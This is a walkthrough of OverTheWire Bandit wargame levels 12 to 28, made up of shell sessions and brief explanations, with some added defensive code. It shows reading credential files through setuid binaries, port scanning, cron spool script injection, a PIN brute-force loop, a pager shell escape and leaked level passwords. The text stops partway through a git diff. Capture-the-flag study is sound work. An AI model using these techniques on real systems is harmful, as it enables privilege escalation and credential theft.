Level 12 -> Level 13
In this level we are given a file, data.txt, which is a hex dump of a file that has been compressed repeatedly. To solve this level we have to convert data.txt back to binary with xxd, use the file command to get information about the file, and apply the corresponding decompressions one after another.
bandit12@bandit:~$ mkdir /tmp/an
bandit12@bandit:~$ cp data.txt /tmp/an
bandit12@bandit:~$ cd /tmp/an
bandit12@bandit:/tmp/an$ xxd -r data.txt > data1
bandit12@bandit:/tmp/an$ ls
data.txt data1
bandit12@bandit:/tmp/an$ file data1
data1: gzip compressed data, was "data2.bin", last modified: Thu Dec 28 13:34:36 2017, max compression, from Unix
bandit12@bandit:/tmp/an$ mv data1 c.gz
bandit12@bandit:/tmp/an$ gzip -d c.gz
bandit12@bandit:/tmp/an$ ls
c data.txt
bandit12@bandit:/tmp/an$ file c
c: bzip2 compressed data, block size = 900k
bandit12@bandit:/tmp/an$ bzip2 -d c
bandit12@bandit:/tmp/an$ file c.out
c.out: gzip compressed data, was "data4.bin", last modified: Thu Dec 28 13:34:36 2017, max compression, from Unix
bandit12@bandit:/tmp/an$ mv c.out c.gz
bandit12@bandit:/tmp/an$ gzip -d c.gz
bandit12@bandit:/tmp/an$ file c
c: POSIX tar archive (GNU)
bandit12@bandit:/tmp/an$ mv c c.tar
bandit12@bandit:/tmp/an$ tar x c.tar
tar: Refusing to read archive contents from terminal (missing -f option?)
tar: Error is not recoverable: exiting now
bandit12@bandit:/tmp/an$ tar fx c.tar
bandit12@bandit:/tmp/an$ ls
c.tar data.txt data5.bin
bandit12@bandit:/tmp/an$ file data5.bin
data5.bin: POSIX tar archive (GNU)
bandit12@bandit:/tmp/an$ mv data5.bin data5.tar
bandit12@bandit:/tmp/an$ tar xf data5.tar
bandit12@bandit:/tmp/an$ ls
c.tar data.txt data5.tar data6.bin
bandit12@bandit:/tmp/an$ file data6.bin
data6.bin: bzip2 compressed data, block size = 900k
bandit12@bandit:/tmp/an$ mv data6.bin data6.bzip
bandit12@bandit:/tmp/an$ bzip2 -d data6.bzip
bzip2: Can't guess original name for data6.bzip -- using data6.bzip.out
bandit12@bandit:/tmp/an$ file data6.bzip.out
data6.bzip.out: POSIX tar archive (GNU)
bandit12@bandit:/tmp/an$ mv data6.bzip.out data6.tar
bandit12@bandit:/tmp/an$ tar xf data6.tar
bandit12@bandit:/tmp/an$ ls
c.tar data.txt data5.tar data6.tar data8.bin
bandit12@bandit:/tmp/an$ file data8.bin
data8.bin: gzip compressed data, was "data9.bin", last modified: Thu Dec 28 13:34:36 2017, max compression, from Unix
bandit12@bandit:/tmp/an$ mv data8.bin data8.gz
bandit12@bandit:/tmp/an$ gzip -d data8.gz
bandit12@bandit:/tmp/an$ ls
c.tar data.txt data5.tar data6.tar data8
bandit12@bandit:/tmp/an$ file data8
data8: ASCII text
bandit12@bandit:/tmp/an$ cat data8
The password is 8ZjyCRiBWFYkneahHwxCv3wb2a1ORpYL
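The same procedure as a single loop, as an added example that is not part of the original write-up: the dump is reversed as xxd -r would, each layer is identified by its magic bytes as file does, and it is unpacked in memory with a size cap. The sample input, the placeholder payload and the MAX_LAYERS / MAX_BYTES limits are constructed for the illustration.

```python
import bz2
import gzip
import io
import tarfile

MAX_LAYERS = 32                 # assumed cap on nesting depth
MAX_BYTES = 16 * 1024 * 1024    # assumed cap on any single unpacked layer

# Constructed stand-in for the level's final text file.
PAYLOAD = b"The password is CONSTRUCTED-PLACEHOLDER\n"


def hexdump(data):
    """Render bytes in the default xxd layout: offset, hex pairs, ASCII."""
    lines = []
    for off in range(0, len(data), 16):
        chunk = data[off:off + 16]
        pairs = " ".join(chunk[i:i + 2].hex() for i in range(0, len(chunk), 2))
        text = "".join(chr(b) if 32 <= b < 127 else "." for b in chunk)
        lines.append(f"{off:08x}: {pairs:<39}  {text}")
    return "\n".join(lines) + "\n"


def reverse_hexdump(dump):
    """Do what `xxd -r` does for that layout: keep only the hex column."""
    out = bytearray()
    for line in dump.splitlines():
        if ":" not in line:
            continue
        # The ASCII column starts after the first run of two spaces.
        hex_col = line.split(":", 1)[1].split("  ", 1)[0]
        out += bytes.fromhex(hex_col.replace(" ", ""))
    return bytes(out)


def identify(data):
    """Classify by magic bytes, which is what `file` keys on for these formats."""
    if data[:2] == b"\x1f\x8b":
        return "gzip"
    if data[:3] == b"BZh":
        return "bzip2"
    if data[257:262] == b"ustar":   # magic field of a tar header block
        return "tar"
    return "data"


def bounded_read(stream, max_bytes):
    """Read one unpacked layer, refusing output larger than max_bytes."""
    data = stream.read(max_bytes + 1)
    if len(data) > max_bytes:
        raise ValueError("unpacked layer exceeds size limit")
    return data


def peel(data, max_bytes=MAX_BYTES):
    """Unwrap layers in memory; return (layer kinds outermost first, payload)."""
    layers = []
    for _ in range(MAX_LAYERS):
        kind = identify(data)
        if kind == "data":
            return layers, data
        layers.append(kind)
        src = io.BytesIO(data)
        if kind == "gzip":
            data = bounded_read(gzip.GzipFile(fileobj=src), max_bytes)
        elif kind == "bzip2":
            data = bounded_read(bz2.BZ2File(src), max_bytes)
        else:
            with tarfile.open(fileobj=src, mode="r:") as tar:
                files = [m for m in tar.getmembers() if m.isfile()]
                if len(files) != 1:
                    raise ValueError("expected exactly one file in the archive")
                # extractfile() reads the member; nothing is written to disk.
                data = bounded_read(tar.extractfile(files[0]), max_bytes)
    raise ValueError("more than MAX_LAYERS nested layers")


def tar_wrap(name, data):
    """Build an uncompressed tar archive holding one member."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tar:
        info = tarfile.TarInfo(name)
        info.size = len(data)
        tar.addfile(info, io.BytesIO(data))
    return buf.getvalue()


def build_sample():
    """Constructed input with the same layer order as the session above."""
    blob = gzip.compress(PAYLOAD)
    blob = tar_wrap("data8.bin", blob)
    blob = bz2.compress(blob)
    blob = tar_wrap("data6.bin", blob)
    blob = tar_wrap("data5.bin", blob)
    blob = gzip.compress(blob)
    blob = bz2.compress(blob)
    return gzip.compress(blob)


if __name__ == "__main__":
    dump = hexdump(build_sample())
    layers, payload = peel(reverse_hexdump(dump))
    print(" -> ".join(layers))
    print(payload.decode(), end="")
```

Because every layer is read through bounded_read and tar members are never written to disk, the loop can be pointed at untrusted input without the usual decompression-bomb and path-traversal exposure of unpacking by hand.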
Level 13 -> Level 14
In this level we are told that the flag is in /etc/bandit_pass/bandit14 but can only be read by the user bandit14; for that we are given an SSH private key that we must use to get access to the password.
bandit13@bandit:~$ ls
sshkey.private
bandit13@bandit:~$ ssh -i sshkey.private bandit14@localhost
Could not create directory '/home/bandit13/.ssh'.
The authenticity of host 'localhost (127.0.0.1)' can't be established.
ECDSA key fingerprint is SHA256:98UL0ZWr85496EtCRkKlo20X3OPnyPSB5tB5RPbhczc.
Are you sure you want to continue connecting (yes/no)? yes
Failed to add the host to the list of known hosts (/home/bandit13/.ssh/known_hosts).
bandit14@bandit:~$ cat /etc/bandit_pass/bandit14
4wcYUJFw0k0XLShlDzztnTBHiqxU3b3e
Level 14 -> Level 15
This level states that the password for the next level can be obtained by sending the current level's password to port 30000 on localhost.
bandit14@bandit:~$ telnet localhost 30000
Trying ::1...
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
4wcYUJFw0k0XLShlDzztnTBHiqxU3b3e
Correct!
BfMYroe26WYalil77FoDi9qh59eK5xNr
Connection closed by foreign host.
Level 15 -> Level 16
This level is similar to the previous one: we are asked to send the current password to port 30001 on localhost, with the difference that we have to do it over an encrypted channel.
bandit15@bandit:~$ openssl s_client -connect localhost:30001 -ign_eof
CONNECTED(00000003)
depth=0 CN = bandit
verify error:num=18:self signed certificate
verify return:1
depth=0 CN = bandit
verify return:1
---
Certificate chain
0 s:/CN=bandit
i:/CN=bandit
---
Server certificate
subject=/CN=bandit
issuer=/CN=bandit
---
No client certificate CA names sent
---
SSL handshake has read 1015 bytes and written 631 bytes
---
New, TLSv1/SSLv3, Cipher is AES128-SHA
Server public key is 2048 bit
Secure Renegotiation IS supported
Compression: NONE
Expansion: NONE
No ALPN negotiated
SSL-Session:
Protocol : TLSv1
Cipher : AES128-SHA
Session-ID: 390D38ED94122F6FD7F9B68BD31EB1043DB14D5D24F9DEB823AAD3D4B970E546
Session-ID-ctx:
Master-Key: 3F4FFA74A9CF8627193150E8708AD0E42E97873854682EAF00585A669DC4D1BA8992C051D40063B299F25086F9D760AE
Key-Arg : None
PSK identity: None
PSK identity hint: None
SRP username: None
TLS session ticket lifetime hint: 7200 (seconds)
TLS session ticket:
Start Time: 1534092520
Timeout : 300 (sec)
Verify return code: 18 (self signed certificate)
---
BfMYroe26WYalil77FoDi9qh59eK5xNr
Correct!
cluFn7wTiGryunymYOu4RcffSxQluehd
closed
Level 16 -> Level 17
This level is again very similar to the previous ones, with the difference that there are multiple servers listening on ports ranging from 31000 to 32000. To solve it we can use nc to find out which ones are open and, since there are only a few, try them one by one.
bandit16@bandit:~$ mkdir /tmp/ang/hola
bandit16@bandit:~$ nc -zv localhost 31000-32000 2> /tmp/ang/hola
bandit16@bandit:~$ cat /tmp/ang/hola | grep suc
Connection to localhost 31046 port [tcp/*] succeeded!
Connection to localhost 31518 port [tcp/*] succeeded!
Connection to localhost 31691 port [tcp/*] succeeded!
Connection to localhost 31790 port [tcp/*] succeeded!
Connection to localhost 31960 port [tcp/*] succeeded!
bandit16@bandit:~$ openssl s_client -connect localhost:31790 -ign_eof
CONNECTED(00000003)
depth=0 CN = bandit
verify error:num=18:self signed certificate
verify return:1
depth=0 CN = bandit
verify return:1
---
Certificate chain
0 s:/CN=bandit
i:/CN=bandit
---
Server certificate
subject=/CN=bandit
issuer=/CN=bandit
---
No client certificate CA names sent
---
SSL handshake has read 1015 bytes and written 631 bytes
---
New, TLSv1/SSLv3, Cipher is AES128-SHA
Server public key is 2048 bit
Secure Renegotiation IS supported
Compression: NONE
Expansion: NONE
No ALPN negotiated
SSL-Session:
Protocol : TLSv1
Cipher : AES128-SHA
Session-ID: 06DABAB6C4656E9FC34A5F6ED53A0865A49857C66A73BFBAA740F3EB2208B805
Session-ID-ctx:
Master-Key: F1E42EEC279D5777BA24D8870F643F51DD8661008DC05F87E6FA0CDACDE2E9CEB5D170044269AC96A949246730235B36
Key-Arg : None
PSK identity: None
PSK identity hint: None
SRP username: None
TLS session ticket lifetime hint: 7200 (seconds)
TLS session ticket:
Start Time: 1534093610
Timeout : 300 (sec)
Verify return code: 18 (self signed certificate)
---
cluFn7wTiGryunymYOu4RcffSxQluehd
Correct!
-----BEGIN RSA PRIVATE KEY-----
-----END RSA PRIVATE KEY-----
closed
bandit16@bandit:~$ chmod og-rw /tmp/ang/key
bandit16@bandit:~$ ssh -i /tmp/ang/key bandit17@localhost
Could not create directory '/home/bandit16/.ssh'.
The authenticity of host 'localhost (127.0.0.1)' can't be established.
ECDSA key fingerprint is SHA256:98UL0ZWr85496EtCRkKlo20X3OPnyPSB5tB5RPbhczc.
Are you sure you want to continue connecting (yes/no)? yes
bandit17@bandit:~$ cat /etc/bandit_pass/bandit17
xLYVMN9WE5zQ5vHacb0sZEVqbrp7nBTn
Level 17 -> Level 18
In this level we are told that we have two files (passwords.old and passwords.new) and that the correct password for the next level is the only one that changes between the 2 files, so it is enough to run a diff between both files to find that password.
bandit17@bandit:~$ diff passwords.new passwords.old
42c42
< kfBf3eYk5BPBRzwjqutbbfE887SVc5Yd
---
> 6vcSC74ROI95NqkKaeEC2ABVMDX9TyUr
Level 18 -> Level 19
In this level we are told that the password for the next level is in a file called readme; the problem is that when we log in over ssh the system kicks us out before we can do anything else. The solution is to tell ssh which command to run (cat /home/bandit18/readme) instead of using ssh to log in to the system.
angelluis@sunny:~$ ssh bandit18@bandit.labs.overthewire.org -p 2220 cat /home/bandit18/readme
This is a OverTheWire game server. More information on http://www.overthewire.org/wargames
bandit18@bandit.labs.overthewire.org's password:
IueksS7Ubh8G3DCwVzrTd8rAVOwq3M5x
Level 19 -> Level 20
In this case we are told to run the binary in the home directory, which has the s bit set. To solve this level we see that we can pass a command to this binary and it will be executed as the owner of the binary. As can be seen, the owner is bandit20, so when running it we have that user's permissions and can read the file /etc/bandit_pass/bandit20.
bandit19@bandit:~$ ./bandit20-do
Run a command as another user.
Example: ./bandit20-do id
bandit19@bandit:~$ ./bandit20-do cat /etc/bandit_pass/bandit20
GbKksEFF4yrVs6il55v6gwY5aVje5f0j
Level 20 -> Level 21
To solve this level we have to work with Linux job control: we run netcat on an arbitrary port (1234 in this case) and leave it running in the background. Next we run the binary in the home directory, giving 1234 as its argument, and let it run in the background too. Now we can list the active jobs with jobs, bring the first process to the foreground and enter the current password so that it returns the one for the next level.
bandit20@bandit:~$ nc -l 1234 &
[1] 29215
bandit20@bandit:~$ ./suconnect 1234 &
[2] 29355
bandit20@bandit:~$ jobs
[1]- Running nc -l 1234 &
[2]+ Running ./suconnect 1234 &
bandit20@bandit:~$ fg %1
nc -l 1234
GbKksEFF4yrVs6il55v6gwY5aVje5f0j
Read: GbKksEFF4yrVs6il55v6gwY5aVje5f0j
Password matches, sending next password
gE269g2h3mw3pwgrj0Ha9Uoqen1c9DGr
[2]- Done ./suconnect 1234
Level 21 -> Level 22
In this level we are told that there is a cron job running periodically. To solve it, it is enough to look at the cron configuration and see that the password for the next level is being written to a particular file.
bandit21@bandit:~$ ls /etc/cron.d
cronjob_bandit22 cronjob_bandit23 cronjob_bandit24 popularity-contest
bandit21@bandit:~$ cat /etc/cron.d/cronjob_bandit22
@reboot bandit22 /usr/bin/cronjob_bandit22.sh &> /dev/null
* * * * * bandit22 /usr/bin/cronjob_bandit22.sh &> /dev/null
bandit21@bandit:~$ cat /usr/bin/cron
cronjob_bandit22.sh cronjob_bandit24.sh
cronjob_bandit23.sh crontab
bandit21@bandit:~$ cat /usr/bin/cronjob_bandit22.sh
#!/bin/bash
chmod 644 /tmp/t7O6lds9S0RqQh9aMcz6ShpAoZKF7fgv
cat /etc/bandit_pass/bandit22 > /tmp/t7O6lds9S0RqQh9aMcz6ShpAoZKF7fgv
bandit21@bandit:~$ cat /tmp/t7O6lds9S0RqQh9aMcz6ShpAoZKF7fgv
Yk7owGAcWjwMVRwrTesJEwB7WVOiILLI
Level 22 -> Level 23
Again this level consists of inspecting cron and being able to read the script it runs. What the script does is run, as bandit23, the echo command followed by an md5, so if we run the echo command by hand and get its md5 we will know where it is storing the password for the next level.
bandit22@bandit:~$ cat /etc/cron.d/cronjob_bandit23
@reboot bandit23 /usr/bin/cronjob_bandit23.sh &> /dev/null
* * * * * bandit23 /usr/bin/cronjob_bandit23.sh &> /dev/null
bandit22@bandit:~$ cat /usr/bin/cronjob_bandit23.sh
#!/bin/bash
myname=$(whoami)
mytarget=$(echo I am user $myname | md5sum | cut -d ' ' -f 1)
echo "Copying passwordfile /etc/bandit_pass/$myname to /tmp/$mytarget"
cat /etc/bandit_pass/$myname > /tmp/$mytarget
bandit22@bandit:~$ echo "I am user bandit23" | md5sum
8ca319486bfbbc3663ea0fbe81326349 -
bandit22@bandit:~$ cat /tmp/8ca319486bfbbc3663ea0fbe81326349
jc1udXuA1tiHqjIsL8yaapX5XIAI6i0n
Level 23 -> Level 24
Very similar to the previous one, with the difference that this time we will have to create a script to get the password for the next level.
bandit23@bandit:~$ cat /etc/cron.d/cronjob_bandit24
@reboot bandit24 /usr/bin/cronjob_bandit24.sh &> /dev/null
* * * * * bandit24 /usr/bin/cronjob_bandit24.sh &> /dev/null
bandit23@bandit:~$ cat /usr/bin/cronjob_bandit24.sh
#!/bin/bash
myname=$(whoami)
cd /var/spool/$myname
echo "Executing and deleting all scripts in /var/spool/$myname:"
for i in * .*;
do
if [ "$i" != "." -a "$i" != ".." ];
then
echo "Handling $i"
timeout -s 9 60 ./$i
rm -f ./$i
fi
done
bandit23@bandit:~$ nano /tmp/ang1/script.sh
bandit23@bandit:~$ cat /tmp/ang1/script.sh
cat /etc/bandit_pass/bandit24 > /tmp/ang1/pass
bandit23@bandit:~$ chmod 777 /tmp/ang1
bandit23@bandit:~$ chmod 777 /tmp/ang1/script.sh
bandit23@bandit:~$ cp /tmp/ang1/script.sh /var/spool/bandit24/
bandit23@bandit:~$ date
Sun Aug 12 20:48:55 CEST 2018
bandit23@bandit:~$ date
Sun Aug 12 20:49:01 CEST 2018
bandit23@bandit:~$ ll /var/spool/bandit24/script.sh
ls: cannot access '/var/spool/bandit24/script.sh': No such file or directory
bandit23@bandit:~$ cat /tmp/ang1/pass
UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ
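Seen from the defender's side, the cron script above executes whatever any user drops into the spool directory. The following is an added sketch (not code from the game or from the original write-up) of the checks a job runner could apply before executing a spool entry; the function names, the constructed spool contents and the chosen rules are assumptions made for the illustration.

```python
import os
import stat
import tempfile


def spool_dir_problems(spool_dir, trusted_uid):
    """List reasons why the spool directory itself cannot be trusted."""
    st = os.stat(spool_dir)
    problems = []
    if st.st_uid != trusted_uid:
        problems.append("directory owned by uid %d" % st.st_uid)
    if st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
        problems.append("directory is writable by group or others")
    return problems


def runnable_entries(spool_dir, trusted_uid):
    """Split spool entries into (accepted names, {rejected name: reason})."""
    accepted, rejected = [], {}
    for name in sorted(os.listdir(spool_dir)):
        # lstat() does not follow symlinks, so a link to another file
        # is classified as a link and rejected.
        st = os.lstat(os.path.join(spool_dir, name))
        if not stat.S_ISREG(st.st_mode):
            rejected[name] = "not a regular file"
        elif st.st_uid != trusted_uid:
            rejected[name] = "owned by uid %d" % st.st_uid
        elif st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
            rejected[name] = "writable by group or others"
        elif not st.st_mode & stat.S_IXUSR:
            rejected[name] = "not executable by owner"
        else:
            accepted.append(name)
    return accepted, rejected


def build_constructed_spool(root):
    """Create a constructed spool directory with one good and three bad entries."""
    spool = os.path.join(root, "spool")
    os.mkdir(spool)

    def put(name, mode):
        path = os.path.join(spool, name)
        with open(path, "w") as fh:
            fh.write("#!/bin/sh\ntrue\n")
        os.chmod(path, mode)

    put("job-ok.sh", 0o700)
    put("job-world-writable.sh", 0o777)   # same mode as the script in the session
    put("job-not-exec.sh", 0o600)
    os.symlink("/bin/sh", os.path.join(spool, "job-link"))
    os.chmod(spool, 0o777)                # anyone can drop files, as in the level
    return spool


def demo():
    """Evaluate the constructed spool for its owner and for a different uid."""
    with tempfile.TemporaryDirectory() as root:
        spool = build_constructed_spool(root)
        me = os.getuid()
        return {
            "dir": spool_dir_problems(spool, me),
            "own": runnable_entries(spool, me),
            # A runner whose trusted uid differs from the file owner accepts nothing.
            "foreign": runnable_entries(spool, me + 1),
        }


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, value)
```

The check and the later execution are separate steps, so a real runner would also need to close the race between them, for example by keeping the spool directory writable only by the trusted user.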
Level 24 -> Level 25
In this level, once again, there is a daemon running on port 30002 that asks for the current password and a 4-digit PIN in order to return the password for the next level. I used two approaches here. The first was a loop from 0 to 10000 that called nc on every iteration; this approach is very slow and I abandoned it (I still leave the code at the top). The second approach was to generate a file with every possible PIN and pass it directly to netcat, which is much more efficient and returns the password for the next level.
bandit24@bandit:/tmp/brute$ cat /tmp/brute/brute.sh
#!/bin/bash
for i in {0..10000}; do
    echo "UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ $i" | nc localhost 30002 | grep -v -e pincode -e Wrong -e Exiting
    echo "Try $i";
done
# TAKES TOO LONG
#!/bin/bash
for i in {1..10000}
do
    echo "UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ $i" >> ./out
done
cat out | nc localhost 30002
I am the pincode checker for user bandit25. Please enter the password for user bandit24 and the secret pincode on a single line, separated by a space.
Wrong! Please enter the correct pincode. Try again.
Wrong! Please enter the correct pincode. Try again.
Wrong! Please enter the correct pincode. Try again.
Wrong! Please enter the correct pincode. Try again.
Wrong! Please enter the correct pincode. Try again.
Wrong! Please enter the correct pincode. Try again.
Wrong! Please enter the correct pincode. Try again.
Wrong! Please enter the correct pincode. Try again.
Wrong! Please enter the correct pincode. Try again.
Correct!
The password of user bandit25 is uNG9O58gUE7snukf3bvZ0rxhtnjzSGzG
Exiting.
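Both approaches above work because the checker accepts an unlimited number of guesses, within one connection or across many. As an added example (not the daemon's real code and not part of the original write-up), this checker keeps a failure counter per client that survives reconnects and locks out after a fixed number of wrong lines; the state directory, the client label and the lockout message are assumptions, and the reply strings are the ones shown in the output above.

```shell
#!/bin/sh
# Added example, not the Bandit daemon. Names and the state layout are
# hypothetical; it handles one connection's input on stdin.

# pin_checker STATE_DIR CLIENT PASSWORD PIN MAX_WRONG
# Reads "password pin" lines. Wrong lines are counted in
# STATE_DIR/CLIENT.fails, so the count survives a reconnect. Once the
# count reaches MAX_WRONG every further line is refused, correct or not.
# Exit status: 0 correct, 1 input ended, 2 locked out, 3 bad client label.
pin_checker() (
    state=$1 client=$2 password=$3 pin=$4 max_wrong=$5

    # The label becomes a file name: refuse anything that could leave
    # the state directory.
    case $client in
        ''|*[!A-Za-z0-9._-]*) echo "Bad client label."; exit 3 ;;
    esac

    counter="$state/$client.fails"
    wrong=$(cat "$counter" 2>/dev/null || echo 0)

    while IFS= read -r line; do
        # Check the lockout before looking at the guess, so a locked
        # client learns nothing from further attempts.
        if [ "$wrong" -ge "$max_wrong" ]; then
            echo "Locked out. Exiting."
            exit 2
        fi
        if [ "$line" = "$password $pin" ]; then
            echo "Correct!"
            rm -f -- "$counter"
            exit 0
        fi
        wrong=$((wrong + 1))
        # A real daemon would update this atomically (lock or database).
        echo "$wrong" > "$counter"
        echo "Wrong! Please enter the correct pincode. Try again."
    done
    exit 1
)
```

With a limit of 3, a stream of sequential guesses is cut off after three lines, and opening a new connection per guess hits the same counter.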
Level 25 -> Level 26
This level was quite interesting. To start with, you have to use the ssh key in the home directory to log in to the next level. When we log in to the next level with the ssh key, we see that it kicks us out. If we look at the shell that user is using, we see that it is a script that uses the program more. more has a peculiarity: if the text fits on the screen, the program shows the text and exits, but if the text does not fit on the screen it lets us scroll up and down through the text and also type commands if we press colon (:). To solve this level we have to make the window small so that it lets us run commands, and type:
:set shell=/bin/bash
:shell
bandit25@bandit:~$ ls
bandit26.sshkey
bandit25@bandit:~$ ssh bandit26@localhost -i bandit26.sshkey
Could not create directory '/home/bandit25/.ssh'.
The authenticity of host 'localhost (127.0.0.1)' can't be established.
ECDSA key fingerprint is SHA256:98UL0ZWr85496EtCRkKlo20X3OPnyPSB5tB5RPbhczc.
Are you sure you want to continue connecting (yes/no)? yes
Failed to add the host to the list of known hosts (/home/bandit25/.ssh/known_hosts).
This is a OverTheWire game server. More information on http://www.overthewire.org/wargames
,----.. ,----, .---.
/ / \ ,/ .`| /. ./|
/ . : ,` .' : .--'. ' ;
. / ;. \ ; ; / /__./ \ : |
. ; / ` ; .'___,/ ,' .--'. ' \' .
; | ; \ ; | | : | /___/ \ | ' '
| : | ; | ' ; |.'; ; ; \ \; :
. | ' ' ' : `----' | | \ ; ` |
' ; \; / | ' : ; . \ .\ ;
\ \ ', / | | ' \ \ ' \ |
; : / ' : | : ' |--"
\ \ .' ; |.' \ \ ;
www. `---` ver '---' he '---" ire.org
Welcome to OverTheWire!
If you find any problems, please report them to Steven or morla on
irc.overthewire.org.
--[ Playing the games ]--
This machine might hold several wargames.
If you are playing "somegame", then:
* USERNAMES are somegame0, somegame1, ...
* Most LEVELS are stored in /somegame/.
* PASSWORDS for each level are stored in /etc/somegame_pass/.
Write-access to homedirectories is disabled. It is advised to create a
working directory with a hard-to-guess name in /tmp/. You can use the
command "mktemp -d" in order to generate a random and hard to guess
directory in /tmp/. Read-access to both /tmp/ and /proc/ is disabled
so that users can not snoop on eachother. Files and directories with
easily guessable or short names will be periodically deleted!
Please play nice:
* don't leave orphan processes running
* don't leave exploit-files laying around
* don't annoy other players
* don't post passwords or spoilers
* again, DONT POST SPOILERS!
This includes writeups of your solution on your blog or website!
--[ Tips ]--
This machine has a 64bit processor and many security-features enabled
by default, although ASLR has been switched off. The following
compiler flags might be interesting:
-m32 compile for 32bit
-fno-stack-protector disable ProPolice
-Wl,-z,norelro disable relro
In addition, the execstack tool can be used to flag the stack as
executable on ELF binaries.
Finally, network-access is limited for most levels by a local
firewall.
--[ Tools ]--
For your convenience we have installed a few usefull tools which you can find
in the following locations:
* peda (https://github.com/longld/peda.git) in /usr/local/peda/
* gdbinit (https://github.com/gdbinit/Gdbinit) in /usr/local/gdbinit/
* pwntools (https://github.com/Gallopsled/pwntools)
* radare2 (http://www.radare.org/)
* checksec.sh (http://www.trapkit.de/tools/checksec.html) in /usr/local/bin/checksec.sh
--[ More information ]--
For more information regarding individual wargames, visit
http://www.overthewire.org/wargames/
For support, questions or comments, contact us through IRC on
irc.overthewire.org #wargames.
Enjoy your stay!
_ _ _ _ ___ __
| | | (_) | |__ \ / /
| |__ __ _ _ __ __| |_| |_ ) / /_
| '_ \ / _` | '_ \ / _` | | __| / / '_ \
| |_) | (_| | | | | (_| | | |_ / /| (_) |
|_.__/ \__,_|_| |_|\__,_|_|\__|____\___/
Connection to localhost closed.
bandit25@bandit:~$ cat /etc/passwd | grep bandit26
bandit26:x:11026:11026:bandit level 26:/home/bandit26:/usr/bin/showtext
bandit25@bandit:~$ file /usr/bin/showtext
/usr/bin/showtext: POSIX shell script, ASCII text executable
bandit25@bandit:~$ cat /usr/bin/showtext
#!/bin/sh
export TERM=linux
more ~/text.txt
exit 0
bandit25@bandit:~$ ssh bandit26@localhost -i bandit26.sshkey
:! /bin/bash
:set shell=/bin/bash
:shell
[No write since last change]
bandit26@bandit:~$ cat /etc/bandit_pass/bandit26
5czgV9L3Xx8JPOyRbXh6lQbmIOWvPT6Z
Level 26 -> Level 27
In this level we once again have to use a binary with the s bit set.
bandit26@bandit:~$ ls
bandit27-do text.txt
bandit26@bandit:~$ ./bandit27-do cat /etc/bandit_pass/bandit27
3ba3118a22e93127a4ed485be72ef5ea
Level 27 -> Level 28
In this level something new appears: we have to clone the repository ssh://bandit27-git@localhost/home/bandit27-git/repo and look for the password in that repository. In this case it is quite simple: a plain cat of repo/README shows us the password.
bandit27@bandit:/tmp/git/repo$ mkdir /tmp/repository
bandit27@bandit:/tmp/git/repo$ cd /tmp/repository
bandit27@bandit:/tmp/repository$ git clone ssh://bandit27-git@localhost/home/bandit27-git/repo
Cloning into 'repo'...
Could not create directory '/home/bandit27/.ssh'.
The authenticity of host 'localhost (127.0.0.1)' can't be established.
ECDSA key fingerprint is SHA256:98UL0ZWr85496EtCRkKlo20X3OPnyPSB5tB5RPbhczc.
Are you sure you want to continue connecting (yes/no)? yes
Failed to add the host to the list of known hosts (/home/bandit27/.ssh/known_hosts).
This is a OverTheWire game server. More information on http://www.overthewire.org/wargames
bandit27-git@localhost's password:
remote: Counting objects: 3, done.
remote: Compressing objects: 100% (2/2), done.
remote: Total 3 (delta 0), reused 0 (delta 0)
Receiving objects: 100% (3/3), done.
Checking connectivity... done.
bandit27@bandit:/tmp/repository$ cat repo/README
The password to the next level is: 0ef186ac70e04ea33b4c1853d2526fa2
Level 28 -> Level 29
This level is similar to the previous one, but if we try to cat repo/README.md we see that the password has been removed. To solve the level we can look at the commits that have been made and take a look at the log to see the password.
bandit28@bandit:~$ mkdir /tmp/repository1
bandit28@bandit:~$ cd /tmp/repository1
bandit28@bandit:/tmp/repository1$ git clone ssh://bandit28-git@localhost/home/bandit28-git/repo
Cloning into 'repo'...
Could not create directory '/home/bandit28/.ssh'.
The authenticity of host 'localhost (127.0.0.1)' can't be established.
ECDSA key fingerprint is SHA256:98UL0ZWr85496EtCRkKlo20X3OPnyPSB5tB5RPbhczc.
Are you sure you want to continue connecting (yes/no)? yes
Failed to add the host to the list of known hosts (/home/bandit28/.ssh/known_hosts).
This is a OverTheWire game server. More information on http://www.overthewire.org/wargames
bandit28-git@localhost's password:
remote: Counting objects: 9, done.
remote: Compressing objects: 100% (6/6), done.
remote: Total 9 (delta 2), reused 0 (delta 0)
Receiving objects: 100% (9/9), done.
Resolving deltas: 100% (2/2), done.
Checking connectivity... done.
bandit28@bandit:/tmp/repository1$ cat repo/README.md
# Bandit Notes
Some notes for level29 of bandit.
## credentials
- username: bandit29
- password: xxxxxxxxxx
bandit28@bandit:/tmp/repository1$ cd repo/
bandit28@bandit:/tmp/repository1/repo$ git log
commit 04e2414585ba775805a49b78d662d0946d08f27a
Author: Morla Porla <morla@overthewire.org>
Date: Sun Jul 22 14:47:13 2018 +0200
fix info leak
commit 196c3edc79e362fe89e0d75cfeef079d8c67beef
Author: Morla Porla <morla@overthewire.org>
Date: Sun Jul 22 14:47:13 2018 +0200
add missing data
commit 80383714fa509a363756866425b0b697e87824a0
Author: Ben Dover <noone@overthewire.org>
Date: Sun Jul 22 14:47:13 2018 +0200
initial commit of README.md
bandit28@bandit:/tmp/repository1/repo$ git log -p -2
commit 04e2414585ba775805a49b78d662d0946d08f27a
Author: Morla Porla <morla@overthewire.org>
Date: Sun Jul 22 14:47:13 2018 +0200
fix info leak
diff --git a/README.md b/README.md
index 3f7cee8..5c6457b 100644
--- a/README.md
+++ b/README.md
@@ -4,5 +4,5 @@ Some notes for level29 of bandit.
## credentials
- username: bandit29
-- password: bbc96594b4e001778eee9975372716b2
+- password: xxxxxxxxxx
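Review bot: in the README.md hunk, replacing the `- password:` value with `xxxxxxxxxx` does not close the leak, because the old value is still the removed line of this very commit and stays in the parent blob 3f7cee8 for anyone who can clone the repository. Treat the credential as compromised and rotate it; if the history also has to be cleaned, rewrite it and expire the old objects rather than relying on a follow-up commit.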
commit 196c3edc79e362fe89e0d75cfeef079d8c67beef
Author: Morla Porla <morla@overthewire.org>
Date: Sun Jul 22 14:47:13 2018 +0200
add missing data
diff --git a/README.md b/README.md
index 7ba2d2f..3f7cee8 100644
--- a/README.md
+++ b/README.md
